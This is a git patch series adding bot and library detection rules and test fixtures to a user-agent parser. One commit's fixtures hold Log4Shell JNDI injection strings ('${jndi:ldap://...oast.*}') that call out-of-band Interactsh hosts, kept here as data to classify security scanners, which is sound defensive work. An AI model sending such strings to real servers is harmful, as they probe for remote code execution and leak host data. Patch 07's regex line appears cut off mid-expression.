From df35c5c893b8281c77b5c6f9f77f36396dec09bf Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Fri, 1 Mar 2024 13:22:36 +0100 Subject: [PATCH 01/13] Improves detection for Googlebot News --- Tests/fixtures/bots.yml | 11 ++++++++++- regexes/bots.yml | 8 ++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 8f2df93446..556eb2fe69 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -1331,7 +1331,7 @@ - user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22)) bot: - name: Googlebot + name: Googlebot News category: Search bot url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers producer: @@ -7205,3 +7205,12 @@ producer: name: Open Technologies Bulgaria, Ltd. url: https://kiwitcms.org +- + user_agent: Googlebot-News + bot: + name: Googlebot News + category: Search bot + url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers + producer: + name: Google Inc. + url: https://www.google.com/ diff --git a/regexes/bots.yml b/regexes/bots.yml index a32750f050..7c8c60a171 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -768,6 +768,14 @@ name: 'Visual Meta' url: 'https://www.shopalike.cz/' +- regex: 'Googlebot-News' + name: 'Googlebot News' + category: 'Search bot' + url: 'https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers' + producer: + name: 'Google Inc.' + url: 'https://www.google.com/' + - regex: 'Adwords-(?:DisplayAds|Express|Instant)|Google Web Preview|Google[ -]Publisher[ -]Plugin|Google-(?:Ads-Conversions|Ads-Qualify|Adwords|AMPHTML|Assess|Extended|HotelAdsVerifier|InspectionTool|Lens|PageRenderer|Read-Aloud|Safety|Shopping-Quality|Site-Verification|speakr|Stale-Content-Probe|Test|Youtube-Links)|(?:AdsBot|APIs|DuplexWeb|Feedfetcher|Mediapartners)-Google(?:-Mobile)?|Google(?:AdSenseInfeed|AssociationService|bot|Other|Prober|Producer)|Google.*/\+/web/snippet' name: 'Googlebot' category: 'Search bot' From deb64ecaf697a61da01c87233de14a517c2dd8af Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Fri, 1 Mar 2024 18:45:27 +0100 Subject: [PATCH 02/13] Adds detection for Interactsh --- Tests/fixtures/bots.yml | 58 +++++++++++++++++++++++++++++++++++++++-- regexes/bots.yml | 12 +++++++-- 2 files changed, 66 insertions(+), 4 deletions(-) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 556eb2fe69..b5def282cd 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -4203,8 +4203,8 @@ url: https://github.com/projectdiscovery/httpx category: Crawler producer: - name: "" - url: "" + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ - user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com' bot: @@ -7214,3 +7214,57 @@ producer: name: Google Inc. url: https://www.google.com/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ +- + user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}' + bot: + name: Interactsh + category: Security Checker + url: https://github.com/projectdiscovery/interactsh + producer: + name: ProjectDiscovery, Inc. + url: https://projectdiscovery.io/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 7c8c60a171..443b74cb3b 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -2584,8 +2584,16 @@ url: 'https://github.com/projectdiscovery/httpx' category: 'Crawler' producer: - name: '' - url: '' + name: 'ProjectDiscovery, Inc.' + url: 'https://projectdiscovery.io/' + +- regex: '.*\.oast\.' + name: 'Interactsh' + category: 'Security Checker' + url: 'https://github.com/projectdiscovery/interactsh' + producer: + name: 'ProjectDiscovery, Inc.' + url: 'https://projectdiscovery.io/' - regex: 'scaninfo@(?:expanseinc|paloaltonetworks)\.com' name: 'Expanse' From 3c11453d4146172beb68057790436b462fad81e8 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 01:43:29 +0100 Subject: [PATCH 03/13] Adds detection for webtru --- Tests/fixtures/bots.yml | 9 +++++++++ regexes/bots.yml | 8 ++++++++ 2 files changed, 17 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index b5def282cd..869b77f3a0 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7268,3 +7268,12 @@ producer: name: ProjectDiscovery, Inc. url: https://projectdiscovery.io/ +- + user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler + bot: + name: webtru + category: Crawler + url: https://webtru.io/ + producer: + name: DataSign Inc. + url: https://datasign.jp/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 443b74cb3b..679d2c7673 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4253,6 +4253,14 @@ name: 'Open Technologies Bulgaria, Ltd.' url: 'https://kiwitcms.org' +- regex: 'webtru_crawler' + name: 'webtru' + category: 'Crawler' + url: 'https://webtru.io/' + producer: + name: 'DataSign Inc.' + url: 'https://datasign.jp/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From a00089913cd72d816fdee548f65d565aab8aef55 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 01:50:04 +0100 Subject: [PATCH 04/13] Adds detection for URLSuMaBot --- Tests/fixtures/bots.yml | 6 ++++++ regexes/bots.yml | 5 +++++ 2 files changed, 11 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 869b77f3a0..a02f0be19d 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7277,3 +7277,9 @@ producer: name: DataSign Inc. url: https://datasign.jp/ +- + user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36 + bot: + name: URLSuMaBot + category: Crawler + url: https://www.urlsuma.de/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 679d2c7673..cb2810e540 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4261,6 +4261,11 @@ name: 'DataSign Inc.' url: 'https://datasign.jp/' +- regex: 'URLSuMaBot' + name: 'URLSuMaBot' + category: 'Crawler' + url: 'https://www.urlsuma.de/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From 1f1d8cbc44cb285337e4d132c04371e0e9cefba3 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 01:53:31 +0100 Subject: [PATCH 05/13] Adds detection for 360JK --- Tests/fixtures/bots.yml | 9 +++++++++ regexes/bots.yml | 8 ++++++++ 2 files changed, 17 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index a02f0be19d..9a381e3c01 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7283,3 +7283,12 @@ name: URLSuMaBot category: Crawler url: https://www.urlsuma.de/ +- + user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691 + bot: + name: 360JK + category: Site Monitor + url: http://jk.cloud.360.cn/ + producer: + name: 360 Security Technology Inc. + url: https://www.360.cn/ diff --git a/regexes/bots.yml b/regexes/bots.yml index cb2810e540..6e1d6981fc 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4266,6 +4266,14 @@ category: 'Crawler' url: 'https://www.urlsuma.de/' +- regex: '360JK yunjiankong' + name: '360JK' + category: 'Site Monitor' + url: 'http://jk.cloud.360.cn/' + producer: + name: '360 Security Technology Inc.' + url: 'https://www.360.cn/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From c922af4265c58c1cf15bcf785c03890bdeeb227e Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 01:56:03 +0100 Subject: [PATCH 06/13] Improves detection for generic bots --- Tests/fixtures/bots.yml | 4 ++++ regexes/bots.yml | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 9a381e3c01..41c4e191b6 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7292,3 +7292,7 @@ producer: name: 360 Security Technology Inc. url: https://www.360.cn/ +- + user_agent: LinkChain + bot: + name: Generic Bot diff --git a/regexes/bots.yml b/regexes/bots.yml index 6e1d6981fc..0a24e788b7 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4275,7 +4275,7 @@ url: 'https://www.360.cn/' # Generic bots -- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' +- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' # Generic detections From bcbe64b5fd2d0806c1b1ea20010a28a62a2da112 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 20:11:07 +0100 Subject: [PATCH 07/13] Improves detection for generic bots --- Tests/fixtures/bots.yml | 4 ++++ regexes/bots.yml | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 41c4e191b6..acca424fdd 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7296,3 +7296,7 @@ user_agent: LinkChain bot: name: Generic Bot +- + user_agent: Morfeus Fucking Scanner + bot: + name: Generic Bot diff --git a/regexes/bots.yml b/regexes/bots.yml index 0a24e788b7..53e561b3e0 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4279,5 +4279,5 @@ name: 'Generic Bot' # Generic detections -- regex: '[a-z0-9_-]*(?:(? Date: Sun, 3 Mar 2024 21:57:52 +0100 Subject: [PATCH 08/13] Adds detection for UCSB Network Measurement --- Tests/fixtures/bots.yml | 9 +++++++++ regexes/bots.yml | 8 ++++++++ 2 files changed, 17 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index acca424fdd..aa13d95458 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7300,3 +7300,12 @@ user_agent: Morfeus Fucking Scanner bot: name: Generic Bot +- + user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;) + bot: + name: UCSB Network Measurement + category: Crawler + url: https://www.it.ucsb.edu/ + producer: + name: University of California, Santa Barbara + url: https://www.it.ucsb.edu/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 53e561b3e0..6cddc93e63 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4274,6 +4274,14 @@ name: '360 Security Technology Inc.' url: 'https://www.360.cn/' +- regex: 'UCSBNetworkMeasurement' + name: 'UCSB Network Measurement' + category: 'Crawler' + url: 'https://www.it.ucsb.edu/' + producer: + name: 'University of California, Santa Barbara' + url: 'https://www.it.ucsb.edu/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From 4c0d4c7d76d0d0ab4c3d9b65a2d6b4791f6fec0d Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 22:01:56 +0100 Subject: [PATCH 09/13] Adds detection for Plesk Screenshot Service --- Tests/fixtures/bots.yml | 9 +++++++++ regexes/bots.yml | 8 ++++++++ 2 files changed, 17 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index aa13d95458..347b0c488c 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7309,3 +7309,12 @@ producer: name: University of California, Santa Barbara url: https://www.it.ucsb.edu/ +- + user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066 + bot: + name: Plesk Screenshot Service + category: Service Agent + url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service + producer: + name: Plesk International GmbH + url: https://www.plesk.com/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 6cddc93e63..a4539afb47 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4282,6 +4282,14 @@ name: 'University of California, Santa Barbara' url: 'https://www.it.ucsb.edu/' +- regex: 'Plesk screenshot bot' + name: 'Plesk Screenshot Service' + category: 'Service Agent' + url: 'https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service' + producer: + name: 'Plesk International GmbH' + url: 'https://www.plesk.com/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From fc8430a62a27f236785cb593cdba5b977abffd41 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 22:06:18 +0100 Subject: [PATCH 10/13] Improves detection for Yahoo! Japan --- Tests/fixtures/bots.yml | 9 +++++++++ regexes/bots.yml | 16 ++++++++++++++++ 2 files changed, 25 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 347b0c488c..27e4c46fe0 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7318,3 +7318,12 @@ producer: name: Plesk International GmbH url: https://www.plesk.com/ +- + user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955) + bot: + name: Yahoo! Japan ASR + category: Crawler + url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955 + producer: + name: Yahoo! Japan Corp. + url: https://www.yahoo.co.jp/ diff --git a/regexes/bots.yml b/regexes/bots.yml index a4539afb47..01d697e3b5 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -1920,6 +1920,22 @@ name: 'Yahoo! Japan Corp.' url: 'https://www.yahoo.co.jp/' +- regex: 'Y!J-ASR' + name: 'Yahoo! Japan ASR' + category: 'Crawler' + url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955' + producer: + name: 'Yahoo! Japan Corp.' + url: 'https://www.yahoo.co.jp/' + +- regex: '^Y!J' + name: 'Yahoo! Japan' + category: 'Crawler' + url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955' + producer: + name: 'Yahoo! Japan Corp.' + url: 'https://www.yahoo.co.jp/' + - regex: 'Yandex(?:(?:\.Gazeta |Accessibility|Mobile|MobileScreenShot|RenderResources|Screenshot|Sprav)?Bot|(?:AdNet|Antivirus|Blogs|Calendar|Catalog|Direct|Favicons|ForDomain|ImageResizer|Images|Market|Media|Metrika|News|OntoDB(?:API)?|Pagechecker|Partner|RCA|SearchShop|(?:News|Site)links|Tracker|Turbo|Userproxy|Verticals|Vertis|Video|Webmaster))|YaDirectFetcher' name: 'Yandex Bot' category: 'Search bot' From cc2fb5165258b89229fe6fdfe371132d1a067c4e Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 22:09:40 +0100 Subject: [PATCH 11/13] Adds detection for Who.is Bot --- Tests/fixtures/bots.yml | 6 ++++++ regexes/bots.yml | 5 +++++ 2 files changed, 11 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 27e4c46fe0..551faf8485 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7327,3 +7327,9 @@ producer: name: Yahoo! Japan Corp. url: https://www.yahoo.co.jp/ +- + user_agent: Who.is Bot + bot: + name: Who.is Bot + category: Crawler + url: https://who.is/ diff --git a/regexes/bots.yml b/regexes/bots.yml index 01d697e3b5..fd75fa1b98 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -4306,6 +4306,11 @@ name: 'Plesk International GmbH' url: 'https://www.plesk.com/' +- regex: 'Who.is' + name: 'Who.is Bot' + category: 'Crawler' + url: 'https://who.is/' + # Generic bots - regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$' name: 'Generic Bot' From a8563aa244aed7582abccddf7be9b3ac3841a3b3 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 22:10:55 +0100 Subject: [PATCH 12/13] Adds detection for Electron Fetch --- Tests/Parser/Client/fixtures/library.yml | 6 ++++++ regexes/client/libraries.yml | 5 +++++ 2 files changed, 11 insertions(+) diff --git a/Tests/Parser/Client/fixtures/library.yml b/Tests/Parser/Client/fixtures/library.yml index d23587488b..0a2a648fd3 100644 --- a/Tests/Parser/Client/fixtures/library.yml +++ b/Tests/Parser/Client/fixtures/library.yml @@ -635,3 +635,9 @@ type: library name: Kiwi TCMS API version: 12.7 +- + user_agent: electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch) + client: + type: library + name: Electron Fetch + version: "1.0" diff --git a/regexes/client/libraries.yml b/regexes/client/libraries.yml index a914b30270..3bc9cb8440 100644 --- a/regexes/client/libraries.yml +++ b/regexes/client/libraries.yml @@ -250,6 +250,11 @@ version: '$1' url: 'https://github.com/node-fetch/node-fetch' +- regex: 'electron-fetch/?(\d+[\.\d]+)?' + name: 'Electron Fetch' + version: '$1' + url: 'https://github.com/arantes555/electron-fetch' + - regex: 'ReactorNetty/(\d+[\.\d]+)' name: 'ReactorNetty' version: '$1' From 741d0c785382753ccb217b1e9ede14b0619c17d2 Mon Sep 17 00:00:00 2001 From: Liviu-Mihail Concioiu Date: Sun, 3 Mar 2024 22:31:00 +0100 Subject: [PATCH 13/13] Adds detection for WireReaderBot --- Tests/fixtures/bots.yml | 12 ++++++++++++ regexes/bots.yml | 5 +++++ 2 files changed, 17 insertions(+) diff --git a/Tests/fixtures/bots.yml b/Tests/fixtures/bots.yml index 551faf8485..9ba675c31e 100644 --- a/Tests/fixtures/bots.yml +++ b/Tests/fixtures/bots.yml @@ -7333,3 +7333,15 @@ name: Who.is Bot category: Crawler url: https://who.is/ +- + user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app) + bot: + name: WireReaderBot + category: Feed Fetcher + url: https://wirereader.app/ +- + user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) + bot: + name: WireReaderBot + category: Feed Fetcher + url: https://wirereader.app/ diff --git a/regexes/bots.yml b/regexes/bots.yml index fd75fa1b98..239b65158f 100644 --- a/regexes/bots.yml +++ b/regexes/bots.yml @@ -5,6 +5,11 @@ # @license http://www.gnu.org/licenses/lgpl.html LGPL v3 or later ############### +- regex: 'WireReaderBot(?:/([\d+.]+))?' + name: 'WireReaderBot' + category: 'Feed Fetcher' + url: 'https://wirereader.app/' + - regex: 'monitoring360bot' name: '360 Monitoring' category: 'Site Monitor'